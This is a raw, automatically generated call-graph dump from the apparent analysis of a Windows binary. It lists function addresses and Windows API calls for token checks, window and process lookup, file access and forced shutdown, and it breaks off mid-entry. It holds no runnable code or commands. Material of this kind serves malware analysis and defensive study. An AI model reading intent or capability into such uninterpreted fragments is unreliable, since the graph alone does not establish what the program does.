GetProcAddress 76371 11029918 SetLastError 76370->76371 76370->76373 76372 11029922 GetLastError 76371->76372 76372->76373 76374 1102993d GetProcAddress 76372->76374 76373->76329 76373->76331 76373->76332 76373->76334 76373->76335 76373->76337 76373->76338 76373->76339 76373->76341 76373->76350 76373->76351 76373->76356 76373->76357 76373->76358 76373->76363 76373->76364 76373->76370 76373->76372 76376 11029975 GetLastError 76373->76376 76377 1102998c GetDesktopWindow 76373->76377 76374->76373 76375 1102996d SetLastError 76374->76375 76375->76376 76376->76373 76376->76377 76377->76373 76378 1102999a GetProcAddress 76377->76378 76378->76373 76379 110299d6 SetLastError 76378->76379 76379->76373 76380->76180 76382 1114229a 76381->76382 76383 1114229c 76381->76383 76382->76190 76384 1110f4a0 std::locale::_Init 265 API calls 76383->76384 76385 111422c2 76384->76385 76386 111422cb _strncpy 76385->76386 76387 111422e9 76385->76387 76386->76190 76535 11029450 265 API calls 2 library calls 76387->76535 76390->76190 76536 110d05c0 76391->76536 76394 110d07e9 76541 11162be5 76394->76541 76395 110d07d2 76540 11029450 265 API calls 2 library calls 76395->76540 76398 110d07f2 76398->76163 76400->76166 76401->76168 76407 110d148c 76406->76407 76408 110d14a7 76407->76408 76409 110d1490 76407->76409 76422 110d0190 76408->76422 76451 11029450 265 API calls 2 library calls 76409->76451 76416 110d14de 76416->76309 76416->76310 76417 110d14c7 76452 11029450 265 API calls 2 library calls 76417->76452 76423 110d0199 76422->76423 76424 110d019d 76423->76424 76425 110d01b4 76423->76425 76453 11029450 265 API calls 2 library calls 76424->76453 76427 110d01b1 76425->76427 76428 110d01e8 76425->76428 76427->76425 76454 11029450 265 API calls 2 library calls 76427->76454 76430 110d01e5 76428->76430 76431 110d0206 76428->76431 76430->76428 76455 11029450 265 API calls 2 library calls 76430->76455 76434 110d1090 76431->76434 76435 110d109e 76434->76435 76436 110d10b9 76435->76436 76437 110d10a2 76435->76437 76440 110d10b6 76436->76440 76441 110d10ec 76436->76441 76456 11029450 265 API calls 2 library calls 76437->76456 76439 110d1160 76439->76416 76439->76417 76440->76436 76457 11029450 265 API calls 2 library calls 76440->76457 76441->76439 76441->76441 76458 110d09e0 76441->76458 76447 110d111f _memmove 76447->76439 76448 110d1149 76447->76448 76470 11029450 265 API calls 2 library calls 76448->76470 76459 110d09ed 76458->76459 76460 110d0a08 76459->76460 76461 110d09f1 76459->76461 76463 110d0a05 76460->76463 76464 110d0a26 76460->76464 76476 11029450 265 API calls 2 library calls 76461->76476 76463->76460 76477 11029450 265 API calls 2 library calls 76463->76477 76471 110d0450 76464->76471 76469 110d0920 268 API calls 2 library calls 76469->76447 76472 110d045b 76471->76472 76473 110d0472 76471->76473 76478 11029450 265 API calls 2 library calls 76472->76478 76473->76447 76473->76469 76480 110d072f 76479->76480 76481 11163d09 _strlen 76479->76481 76480->76320 76482 11162b51 _malloc 66 API calls 76481->76482 76483 11163d1c 76482->76483 76483->76480 76500 1116be9f 76483->76500 76488 110cfe7d 76487->76488 76489 110cfe98 76488->76489 76490 110cfe81 76488->76490 76493 110cfe95 76489->76493 76494 110cfeb6 76489->76494 76521 11029450 265 API calls 2 library calls 76490->76521 76493->76489 76522 11029450 265 API calls 2 library calls 76493->76522 76495 110cfeb3 76494->76495 76498 110cfed9 76494->76498 76495->76494 76523 11029450 265 API calls 2 library calls 76495->76523 76498->76324 76498->76325 76501 1116beb4 76500->76501 76502 1116bead 76500->76502 76512 111692ef 66 API calls __getptd_noexit 76501->76512 76502->76501 76505 1116bed2 76502->76505 76506 11163d2e 76505->76506 76514 111692ef 66 API calls __getptd_noexit 76505->76514 76506->76480 76509 1116deb2 76506->76509 76508 1116beb9 76513 1116df04 11 API calls __controlfp_s 76508->76513 76515 1116dd89 76509->76515 76512->76508 76513->76506 76514->76508 76516 1116dda8 _memset __call_reportfault 76515->76516 76517 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 76516->76517 76520 1116de94 __call_reportfault 76517->76520 76518 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76519 1116deb0 GetCurrentProcess TerminateProcess 76518->76519 76519->76480 76520->76518 76525 11162b51 _malloc 66 API calls 76524->76525 76526 1110f4ae 76525->76526 76527 1110f4b7 76526->76527 76528 1110f4ce _memset 76526->76528 76534 11029450 265 API calls 2 library calls 76527->76534 76528->76368 76531->76368 76532->76354 76533->76359 76537 110d05d9 76536->76537 76538 110d05ec 76536->76538 76537->76538 76539 110d0450 265 API calls 76537->76539 76538->76394 76538->76395 76539->76538 76542 11162bf0 HeapFree 76541->76542 76546 11162c19 __dosmaperr 76541->76546 76543 11162c05 76542->76543 76542->76546 76547 111692ef 66 API calls __getptd_noexit 76543->76547 76545 11162c0b GetLastError 76545->76546 76546->76398 76547->76545 76549 1109e930 GetTokenInformation 76548->76549 76554 1109e9c6 76548->76554 76552 1109e952 __crtCompareStringA_stat 76549->76552 76550 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76551 1109e9d8 76550->76551 76551->76012 76553 1109e958 GetTokenInformation 76552->76553 76552->76554 76553->76554 76555 1109e96a 76553->76555 76554->76550 76556 1109e99f EqualSid 76555->76556 76557 1109e973 AllocateAndInitializeSid 76555->76557 76556->76554 76558 1109e9ad 76556->76558 76557->76554 76557->76556 76559 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76558->76559 76560 1109e9c2 76559->76560 76560->76012 76562 1114302a 76561->76562 76562->76028 76564 11162dd1 76563->76564 76582 1116364b 76564->76582 76567 11163a2d 76568 11163a4d 76567->76568 76569 11163a3b 76567->76569 76717 111639dc 79 API calls 2 library calls 76568->76717 76569->76037 76571 11163a57 76571->76037 76573 11081c6d 76572->76573 76574 11081c72 76572->76574 76718 11081990 IsDBCSLeadByte 76573->76718 76576 11081c7b 76574->76576 76581 11081c93 76574->76581 76719 11163784 85 API calls 3 library calls 76576->76719 76578 11081c99 76578->76029 76579 11081c8c 76579->76029 76580 11165797 85 API calls std::locale::_Init 76580->76581 76581->76578 76581->76580 76583 11163664 76582->76583 76586 11163420 76583->76586 76598 11163399 76586->76598 76588 11163444 76606 111692ef 66 API calls __getptd_noexit 76588->76606 76591 11163449 76607 1116df04 11 API calls __controlfp_s 76591->76607 76594 1116347a 76595 111634c1 76594->76595 76608 11170c05 79 API calls 3 library calls 76594->76608 76596 1114519e 76595->76596 76609 111692ef 66 API calls __getptd_noexit 76595->76609 76596->76567 76599 111633ac 76598->76599 76603 111633f9 76598->76603 76610 1116b7b5 76599->76610 76601 111633d9 76601->76603 76630 11170744 68 API calls 6 library calls 76601->76630 76603->76588 76603->76594 76606->76591 76607->76596 76608->76594 76609->76596 76631 1116b73c GetLastError 76610->76631 76612 1116b7bd 76613 111633b1 76612->76613 76645 1116d7aa 66 API calls 3 library calls 76612->76645 76613->76601 76615 111704a8 76613->76615 76616 111704b4 _fgetc 76615->76616 76617 1116b7b5 __getptd 66 API calls 76616->76617 76618 111704b9 76617->76618 76619 111704e7 76618->76619 76621 111704cb 76618->76621 76668 1117373c 76619->76668 76622 1116b7b5 __getptd 66 API calls 76621->76622 76624 111704d0 76622->76624 76623 111704ee 76675 1117045b 74 API calls 3 library calls 76623->76675 76627 111704de _fgetc 76624->76627 76667 1116d7aa 66 API calls 3 library calls 76624->76667 76626 11170502 76676 11170515 LeaveCriticalSection _doexit 76626->76676 76627->76601 76630->76603 76646 1116b5fa TlsGetValue 76631->76646 76634 1116b7a9 SetLastError 76634->76612 76637 1116b76f DecodePointer 76638 1116b784 76637->76638 76639 1116b7a0 76638->76639 76640 1116b788 76638->76640 76642 11162be5 _free 62 API calls 76639->76642 76655 1116b688 66 API calls 4 library calls 76640->76655 76644 1116b7a6 76642->76644 76643 1116b790 GetCurrentThreadId 76643->76634 76644->76634 76647 1116b60f DecodePointer TlsSetValue 76646->76647 76648 1116b62a 76646->76648 76647->76648 76648->76634 76649 11169dbe 76648->76649 76651 11169dc7 76649->76651 76652 11169e04 76651->76652 76653 11169de5 Sleep 76651->76653 76656 11170166 76651->76656 76652->76634 76652->76637 76654 11169dfa 76653->76654 76654->76651 76654->76652 76655->76643 76657 11170172 76656->76657 76664 1117018d 76656->76664 76658 1117017e 76657->76658 76657->76664 76665 111692ef 66 API calls __getptd_noexit 76658->76665 76660 111701a0 RtlAllocateHeap 76662 111701c7 76660->76662 76660->76664 76661 11170183 76661->76651 76662->76651 76664->76660 76664->76662 76666 1116d4a8 DecodePointer 76664->76666 76665->76661 76666->76664 76669 11173764 EnterCriticalSection 76668->76669 76670 11173751 76668->76670 76669->76623 76677 1117367a 76670->76677 76672 11173757 76672->76669 76704 1116d7aa 66 API calls 3 library calls 76672->76704 76675->76626 76676->76624 76678 11173686 _fgetc 76677->76678 76679 11173696 76678->76679 76680 111736ae 76678->76680 76705 1116d99d 66 API calls 2 library calls 76679->76705 76686 111736bc _fgetc 76680->76686 76708 11169d79 76680->76708 76682 1117369b 76706 1116d7ee 66 API calls 7 library calls 76682->76706 76686->76672 76687 111736a2 76707 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 76687->76707 76688 111736ce 76714 111692ef 66 API calls __getptd_noexit 76688->76714 76689 111736dd 76690 1117373c __lock 65 API calls 76689->76690 76693 111736e4 76690->76693 76695 11173717 76693->76695 76696 111736ec InitializeCriticalSectionAndSpinCount 76693->76696 76699 11162be5 _free 65 API calls 76695->76699 76697 11173708 76696->76697 76698 111736fc 76696->76698 76716 11173733 LeaveCriticalSection _doexit 76697->76716 76700 11162be5 _free 65 API calls 76698->76700 76699->76697 76701 11173702 76700->76701 76715 111692ef 66 API calls __getptd_noexit 76701->76715 76705->76682 76706->76687 76710 11169d82 76708->76710 76709 11162b51 _malloc 65 API calls 76709->76710 76710->76709 76711 11169db8 76710->76711 76712 11169d99 Sleep 76710->76712 76711->76688 76711->76689 76713 11169dae 76712->76713 76713->76710 76713->76711 76714->76686 76715->76697 76716->76686 76717->76571 76718->76574 76719->76579 76720->76054 76721 11115b70 76739 11145320 76721->76739 76723 11115b98 76726 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76723->76726 76725 11115bc4 CoInitialize CoCreateInstance 76728 11115bf4 LoadLibraryA 76725->76728 76738 11115be9 76725->76738 76729 11115ba6 76726->76729 76727 111450a0 std::locale::_Init 90 API calls 76730 11115bb5 76727->76730 76731 11115c10 GetProcAddress 76728->76731 76728->76738 76730->76723 76730->76725 76734 11115c20 SHGetSettings 76731->76734 76735 11115c34 FreeLibrary 76731->76735 76732 11115cd1 CoUninitialize 76733 11115cd7 76732->76733 76736 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76733->76736 76734->76735 76735->76738 76737 11115ce6 76736->76737 76738->76732 76738->76733 76740 111450a0 std::locale::_Init 90 API calls 76739->76740 76741 11115b8e 76740->76741 76741->76723 76741->76727 76741->76730 76742 221020 GetCommandLineA 76744 221035 GetStartupInfoA 76742->76744 76745 221090 GetModuleHandleA 76744->76745 76746 22108b 76744->76746 76749 221000 _NSMClient32 76745->76749 76746->76745 76748 2210a2 ExitProcess 76749->76748 76750 11173a35 76751 1116b7b5 __getptd 66 API calls 76750->76751 76752 11173a52 _LcidFromHexString 76751->76752 76753 11173a5f GetLocaleInfoA 76752->76753 76754 11173a86 76753->76754 76755 11173a92 76753->76755 76757 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 76754->76757 76773 111646ce 85 API calls 3 library calls 76755->76773 76759 11173c02 76757->76759 76758 11173a9e 76760 11173aa8 GetLocaleInfoA 76758->76760 76766 11173ad8 _CountryEnumProc@4 _strlen 76758->76766 76760->76754 76762 11173ac7 76760->76762 76761 11173b4b GetLocaleInfoA 76761->76754 76764 11173b6e 76761->76764 76774 111646ce 85 API calls 3 library calls 76762->76774 76776 111646ce 85 API calls 3 library calls 76764->76776 76766->76754 76766->76761 76767 11173b81 _strlen 76767->76754 76778 111739da GetLocaleInfoW _GetPrimaryLen _strlen 76767->76778 76768 11173ad2 76768->76766 76775 11163784 85 API calls 3 library calls 76768->76775 76769 11173b79 76769->76754 76769->76767 76777 111646ce 85 API calls 3 library calls 76769->76777 76773->76758 76774->76768 76775->76766 76776->76769 76777->76767 76778->76754 76779 1102e640 76780 1102e683 76779->76780 76781 1110f420 std::locale::_Init 265 API calls 76780->76781 76782 1102e68a 76781->76782 76784 1102e6aa 76782->76784 77849 11142a60 76782->77849 77178 11142bb0 76784->77178 76787 1102e701 76790 11142bb0 86 API calls 76787->76790 76789 1102e6e6 76792 11081bb0 86 API calls 76789->76792 76791 1102e72a 76790->76791 76793 11162de7 std::locale::_Init 79 API calls 76791->76793 76798 1102e737 76791->76798 76792->76787 76793->76798 76794 1102e766 76795 1102e7e5 CreateEventA 76794->76795 76796 1102e7bf GetSystemMetrics 76794->76796 76803 1102e805 76795->76803 76804 1102e819 76795->76804 76796->76795 76797 1102e7ce 76796->76797 76799 11146450 std::locale::_Init 21 API calls 76797->76799 76798->76794 76801 111450a0 std::locale::_Init 90 API calls 76798->76801 76802 1102e7d8 76799->76802 76801->76794 77867 1102d330 76802->77867 78011 11029450 265 API calls 2 library calls 76803->78011 76807 1110f420 std::locale::_Init 265 API calls 76804->76807 76808 1102e820 76807->76808 76809 1102e840 76808->76809 76810 111100d0 424 API calls 76808->76810 76811 1110f420 std::locale::_Init 265 API calls 76809->76811 76810->76809 76812 1102e854 76811->76812 76813 111100d0 424 API calls 76812->76813 76814 1102e874 76812->76814 76813->76814 76815 1110f420 std::locale::_Init 265 API calls 76814->76815 76816 1102e8f3 76815->76816 76817 1102e923 76816->76817 78012 11060f70 301 API calls std::locale::_Init 76816->78012 76819 1110f420 std::locale::_Init 265 API calls 76817->76819 76820 1102e93d 76819->76820 76821 1102e962 FindWindowA 76820->76821 78013 11060be0 293 API calls std::locale::_Init 76820->78013 76824 1102eab7 76821->76824 76825 1102e99b 76821->76825 77184 110613d0 76824->77184 76825->76824 76828 1102e9b3 GetWindowThreadProcessId 76825->76828 76830 11146450 std::locale::_Init 21 API calls 76828->76830 76829 110613d0 268 API calls 76831 1102ead5 76829->76831 76832 1102e9d9 OpenProcess 76830->76832 76833 110613d0 268 API calls 76831->76833 76832->76824 76834 1102e9f9 76832->76834 76835 1102eae1 76833->76835 78014 11094b30 105 API calls 76834->78014 76837 1102eaf8 76835->76837 76838 1102eaef 76835->76838 77191 11145910 76837->77191 78015 11027d60 119 API calls 2 library calls 76838->78015 76839 1102ea18 76842 11146450 std::locale::_Init 21 API calls 76839->76842 76845 1102ea2c 76842->76845 76843 1102eaf4 76843->76837 76844 1102eb07 77206 11144dc0 ExpandEnvironmentStringsA 76844->77206 76846 1102ea6b CloseHandle FindWindowA 76845->76846 76850 11146450 std::locale::_Init 21 API calls 76845->76850 76847 1102ea93 GetWindowThreadProcessId 76846->76847 76848 1102eaa7 76846->76848 76847->76848 76851 11146450 std::locale::_Init 21 API calls 76848->76851 76853 1102ea3e SendMessageA WaitForSingleObject 76850->76853 76854 1102eab4 76851->76854 76853->76846 76856 1102ea5e 76853->76856 76854->76824 76858 11146450 std::locale::_Init 21 API calls 76856->76858 76857 1102eb2a 76859 1102ec01 76857->76859 77230 11062d60 76857->77230 76860 1102ea68 76858->76860 77245 110274c0 76859->77245 76860->76846 78076 11142ac0 77178->78076 77180 11165797 85 API calls std::locale::_Init 77182 11142bc5 77180->77182 77181 11142ac0 IsDBCSLeadByte 77181->77182 77182->77180 77182->77181 77183 1102e6d4 77182->77183 77183->76787 77857 11081bb0 77183->77857 77185 11061446 77184->77185 77186 110613f7 77184->77186 77187 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 77185->77187 77186->77185 77189 11081bb0 86 API calls 77186->77189 78088 110612f0 268 API calls 4 library calls 77186->78088 77188 1102eac9 77187->77188 77188->76829 77189->77186 78089 11144bd0 77191->78089 77194 11144bd0 std::locale::_Init 265 API calls 77195 11145947 wsprintfA 77194->77195 77196 11143230 std::locale::_Init 8 API calls 77195->77196 77197 11145964 77196->77197 77198 11145990 77197->77198 77200 11143230 std::locale::_Init 8 API calls 77197->77200 77199 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 77198->77199 77201 1114599c 77199->77201 77202 11145979 77200->77202 77201->76844 77202->77198 77203 11145980 77202->77203 77204 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 77203->77204 77205 1114598c 77204->77205 77205->76844 77207 11144df7 77206->77207 77208 11144e14 std::locale::_Init 77207->77208 77209 11144e2e 77207->77209 77217 11144e04 77207->77217 77212 11144e25 GetModuleFileNameA 77208->77212 77210 11144bd0 std::locale::_Init 265 API calls 77209->77210 77213 11144e34 77210->77213 77211 11142290 std::locale::_Init 265 API calls 77214 11144e88 77211->77214 77212->77213 77216 11081b40 std::locale::_Init IsDBCSLeadByte 77213->77216 77215 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 77214->77215 77218 1102eb18 77215->77218 77216->77217 77217->77211 77219 11143230 77218->77219 77220 11143251 CreateFileA 77219->77220 77222 111432ee CloseHandle 77220->77222 77223 111432ce 77220->77223 77226 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 77222->77226 77224 111432d2 CreateFileA 77223->77224 77225 1114330b 77223->77225 77224->77222 77224->77225 77228 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 77225->77228 77227 11143307 77226->77227 77227->76857 77229 1114331a 77228->77229 77229->76857 77231 1105dd10 79 API calls 77230->77231 77232 11062d88 77231->77232 78138 11061c90 77232->78138 78921 11060f40 77245->78921 77850 11142aa8 77849->77850 77852 11142a6e 77849->77852 77851 11142290 std::locale::_Init 265 API calls 77850->77851 77853 11142ab0 77851->77853 77852->77850 77854 11142a92 77852->77854 77853->76784 80361 11142310 267 API calls std::locale::_Init 77854->80361 77856 11142a98 77856->76784 77858 11081bbd 77857->77858 77859 11081bc2 77857->77859 80362 11081990 IsDBCSLeadByte 77858->80362 77861 11081bcb 77859->77861 77866 11081bdf 77859->77866 80363 111646ce 85 API calls 3 library calls 77861->80363 77863 11081c43 77863->76789 77864 11081bd8 77864->76789 77865 11165797 85 API calls std::locale::_Init 77865->77866 77866->77863 77866->77865 77868 11146450 std::locale::_Init 21 API calls 77867->77868 77869 1102d36c 77868->77869 77870 11145320 std::locale::_Init 90 API calls 77869->77870 77871 1102d374 77870->77871 77872 1102d3a9 GetCurrentProcess SetPriorityClass 77871->77872 77873 1102d37d InterlockedIncrement 77871->77873 77876 1102d3dd 77872->77876 77873->77872 77874 1102d38c 77873->77874 77875 11146450 std::locale::_Init 21 API calls 77874->77875 77877 1102d396 77875->77877 77878 1102d3e6 SetEvent 77876->77878 77882 1102d3ed 77876->77882 77879 1102d3a0 Sleep 77877->77879 77878->77882 77879->77879 77880 1102d424 77881 1102d452 77880->77881 80383 1109f1d0 273 API calls std::locale::_Init 77880->80383 80384 11028e70 583 API calls std::locale::_Init 77881->80384 77882->77880 80381 11029370 279 API calls 2 library calls 77882->80381 77886 1102d40d 80382 110ff6c0 278 API calls 2 library calls 77886->80382 77887 1102d463 80364 11028090 SetEvent 77887->80364 77890 1102d468 77891 1102d472 77890->77891 77892 1102d47d 77890->77892 80385 110ec980 654 API calls 77891->80385 77894 1102d49a 77892->77894 77895 1102d49f 77892->77895 80386 110594a0 SetEvent 77894->80386 77897 1102d4a7 77895->77897 77898 1102d4de 77895->77898 77897->77898 77905 1102d4d3 Sleep 77897->77905 77899 11146450 std::locale::_Init 21 API calls 77898->77899 77900 1102d4e8 77899->77900 77901 1102d4f5 77900->77901 77902 1102d526 77900->77902 77901->77900 77903 1105dd10 79 API calls 77901->77903 77904 1102d523 77902->77904 77907 1102d58a 77902->77907 77908 1102d53f 77902->77908 77906 1102d518 77903->77906 77904->77902 77904->77907 77905->77898 77906->77902 80387 1102cff0 294 API calls std::locale::_Init 77906->80387 80390 11026f20 6 API calls std::ios_base::_Tidy 77907->80390 80365 110affa0 77908->80365 77912 1102d590 77918 1102d5af PostThreadMessageA 77912->77918 77921 1102d5cb 77912->77921 77915 1102d613 77919 1102d62d 77915->77919 77929 11146450 std::locale::_Init 21 API calls 77915->77929 80391 1110f3a0 WaitForSingleObject 77918->80391 77923 1102d66b 77919->77923 80394 11105420 26 API calls std::locale::_Init 77919->80394 77920 1102d5f0 80393 11059400 DeleteCriticalSection CloseHandle 77920->80393 77921->77915 77921->77920 80392 1110f3a0 WaitForSingleObject 77921->80392 77922 1102d56a 78008 1102d57d std::ios_base::_Tidy 77922->78008 80389 111352b0 299 API calls 5 library calls 77922->80389 77928 1102d681 77923->77928 77933 11075d10 603 API calls 77923->77933 77934 11146450 std::locale::_Init 21 API calls 77928->77934 77929->77919 77931 1102d661 80395 11107b50 661 API calls std::locale::_Init 77931->80395 77933->77928 77937 1102d68b 77934->77937 77936 1102d889 77941 1102d8a0 77936->77941 80414 1100d200 wsprintfA 77936->80414 77938 1113cc30 311 API calls 77937->77938 77942 1102d690 77938->77942 77939 1102d666 80396 11105ac0 347 API calls std::locale::_Init 77939->80396 77948 1102d8c7 GetModuleFileNameA GetFileAttributesA 77941->77948 77955 1102d9e3 77941->77955 77946 11146450 std::locale::_Init 21 API calls 77942->77946 77949 1102d69a 77946->77949 77947 1102d895 77950 11146450 std::locale::_Init 21 API calls 77947->77950 77951 1102d8ef 77948->77951 77948->77955 77961 1102d6ae std::ios_base::_Tidy 77949->77961 80397 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 77949->80397 77950->77941 77953 1110f420 std::locale::_Init 265 API calls 77951->77953 77952 11146450 std::locale::_Init 21 API calls 77956 1102da92 77952->77956 77960 1102d8f6 77953->77960 77955->77952 80417 11146410 FreeLibrary 77956->80417 77957 11146450 std::locale::_Init 21 API calls 77959 1102d6c1 77957->77959 77971 1102d6d5 std::ios_base::_Tidy 77959->77971 80398 1110e5c0 DeleteCriticalSection std::ios_base::_Tidy 77959->80398 77963 11142a60 267 API calls 77960->77963 77974 1102d918 77960->77974 77961->77957 77962 1102da9a 77964 1102dad6 77962->77964 77969 1102dac4 ExitWindowsEx 77962->77969 77970 1102dab4 ExitWindowsEx Sleep 77962->77970 77963->77974 77966 1102dae6 77964->77966 77967 1102dadb Sleep 77964->77967 77972 11146450 std::locale::_Init 21 API calls 77966->77972 77967->77966 77968 1102d74f 77979 1102d760 std::ios_base::_Tidy 77968->77979 80401 1110fc70 278 API calls 2 library calls 77968->80401 77969->77964 77970->77969 77971->77968 80399 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 77971->80399 77976 1102daf0 ExitProcess 77972->77976 77978 11142bb0 86 API calls 77974->77978 77981 1102d93d 77978->77981 78001 1102d7d9 std::ios_base::_Tidy 77979->78001 80402 1110fc70 278 API calls 2 library calls 77979->80402 77980 11146450 std::locale::_Init 21 API calls 77982 1102d7ec 77980->77982 77981->77955 77984 11081b40 std::locale::_Init IsDBCSLeadByte 77981->77984 77983 1102d809 CloseHandle 77982->77983 80403 1108a570 77982->80403 77986 1102d824 77983->77986 77987 1102d82a 77983->77987 77985 1102d953 77984->77985 77990 1102d96e _memset 77985->77990 80415 11029450 265 API calls 2 library calls 77985->80415 77991 11162be5 _free 66 API calls 77986->77991 77987->78008 80410 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 77987->80410 77988 11146450 std::locale::_Init 21 API calls 78000 1102d6ff std::ios_base::_Tidy 77988->78000 77995 1102d988 FindFirstFileA 77990->77995 77991->77987 77992 1102d800 std::ios_base::_Tidy 77992->77983 77997 1102d9d4 77995->77997 77998 1102d9a8 FindNextFileA 77995->77998 77999 1102d858 77999->78008 80412 1110fc70 278 API calls 2 library calls 77999->80412 78000->77968 78000->77988 80400 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 78000->80400 78001->77980 78002 11162be5 _free 66 API calls 78005 1102d83c 78002->78005 78005->77999 78005->78002 80411 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 78005->80411 80413 1100d4e0 FreeLibrary 78008->80413 78012->76817 78013->76821 78014->76839 78015->76843 78077 11142ad6 78076->78077 78078 11142b93 78077->78078 78083 11081a70 78077->78083 78078->77182 78080 11142afb 78081 11081a70 IsDBCSLeadByte 78080->78081 78082 11142b2b _memmove 78081->78082 78082->77182 78084 11081a7c 78083->78084 78085 11081a81 __mbschr_l std::locale::_Init 78083->78085 78087 11081990 IsDBCSLeadByte 78084->78087 78085->78080 78087->78085 78088->77186 78090 11144bf2 78089->78090 78094 11144c09 std::locale::_Init 78089->78094 78135 11029450 265 API calls 2 library calls 78090->78135 78093 11144d97 78095 11161d01 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 78093->78095 78094->78093 78097 11144c3c GetModuleFileNameA 78094->78097 78096 11144db3 wsprintfA 78095->78096 78096->77194 78113 11081b40 78097->78113 78099 11144c51 78100 11144c61 SHGetFolderPathA 78099->78100 78112 11144d48 78099->78112 78101 11144c8e 78100->78101 78102 11144cad SHGetFolderPathA 78100->78102 78101->78102 78105 11144c94 78101->78105 78106 11144ce2 std::locale::_Init 78102->78106 78103 11142290 std::locale::_Init 262 API calls 78103->78093 78136 11029450 265 API calls 2 library calls 78105->78136 78109 1102a620 std::locale::_Init 145 API calls 78106->78109 78110 11144cf3 78109->78110 78117 11144670 78110->78117 78112->78103 78112->78112 78114 11081b53 _strrchr 78113->78114 78116 11081b6a std::locale::_Init 78114->78116 78137 11081990 IsDBCSLeadByte 78114->78137 78116->78099 78118 111446fa 78117->78118 78119 1114467b 78117->78119 78118->78112 78119->78118 78120 1114468b GetFileAttributesA 78119->78120 78121 111446a5 78120->78121 78122 11144697 78120->78122 78123 11163cf8 __strdup 66 API calls 78121->78123 78122->78112 78124 111446ac 78123->78124 78125 11081b40 std::locale::_Init IsDBCSLeadByte 78124->78125 78126 111446b6 78125->78126 78127 111446d3 78126->78127 78128 11144670 std::locale::_Init 67 API calls 78126->78128 78127->78112 78129 111446c6 78128->78129 78130 111446dc 78129->78130 78131 111446ce 78129->78131 78133 11162be5 _free 66 API calls 78130->78133 78132 11162be5 _free 66 API calls 78131->78132 78132->78127 78134 111446e1 CreateDirectoryA 78133->78134 78134->78127 78137->78116 78259 11144ea0 78138->78259 78140 11061d1c 78141 110d1550 268 API calls 78140->78141 78142 11061d30 78141->78142 78143 11061f17 78142->78143 78193 11061d44 std::ios_base::_Tidy 78142->78193 78268 1116449d 78142->78268 78146 1116449d _fgets 81 API calls 78143->78146 78144 11062c88 78145 11163db7 std::locale::_Init 102 API calls 78145->78144 78193->78144 78193->78145 78265 11144eb3 std::ios_base::_Tidy 78259->78265 78260 11144dc0 267 API calls 78260->78265 78262 11144f1a std::ios_base::_Tidy 78262->78140 78263 11144ed5 GetLastError 78264 11144ee0 Sleep 78263->78264 78263->78265 78266 11163fed std::locale::_Init 143 API calls 78264->78266 78265->78260 78265->78262 78265->78263 78367 11163fed 78265->78367 78267 11144ef2 78266->78267 78267->78262 78267->78265 78269 111644a9 _fgetc 78268->78269 78370 11163f31 78367->78370 78373 11163f3d _fgetc 78370->78373 78371 11163f50 78428 111692ef 66 API calls __getptd_noexit 78371->78428 78373->78371 78375 11163f7d 78373->78375 78374 11163f55 78389 111716f8 78375->78389 78390 11171704 _fgetc 78389->78390 78428->78374 78925 11060e40 78921->78925 78936 11060760 78925->78936 78937 1110f420 std::locale::_Init 265 API calls 78936->78937 78938 1106077c 78937->78938 78939 110607c5 78938->78939 78940 11060783 78938->78940 78995 1116219a 66 API calls std::exception::_Copy_str 78939->78995 78988 1105e300 78940->78988 78944 110607d4 78996 111625f1 RaiseException 78944->78996 78946 110607e9 78989 1105e311 LeaveCriticalSection 78988->78989 78990 1105e31b 78988->78990 78989->78990 78991 1105e32f 78990->78991 78992 11162be5 _free 66 API calls 78990->78992 78992->78991 78995->78944 78996->78946 80361->77856 80362->77859 80363->77864 80364->77890 80418 110805f0 80365->80418 80370 1102d54a 80374 110eb080 80370->80374 80371 110affe7 80430 11029450 265 API calls 2 library calls 80371->80430 80375 110affa0 267 API calls 80374->80375 80376 110eb0ad 80375->80376 80446 110ea450 80376->80446 80380 1102d555 80388 110b0190 267 API calls std::locale::_Init 80380->80388 80381->77886 80382->77880 80383->77881 80384->77887 80385->77892 80386->77895 80387->77904 80388->77922 80389->78008 80390->77912 80391->77912 80392->77921 80394->77931 80395->77939 80396->77923 80398->77971 80399->78000 80400->78000 80401->77979 80402->78001 80404 1108a617 80403->80404 80409 1108a5aa std::ios_base::_Tidy 80403->80409 80405 1108a61e DeleteCriticalSection 80404->80405 80459 1106e1b0 80405->80459 80406 1108a5be CloseHandle 80406->80409 80408 1108a644 std::ios_base::_Tidy 80408->77992 80409->80404 80409->80406 80410->78005 80411->78005 80412->78008 80413->77936 80414->77947 80417->77962 80419 11080614 80418->80419 80420 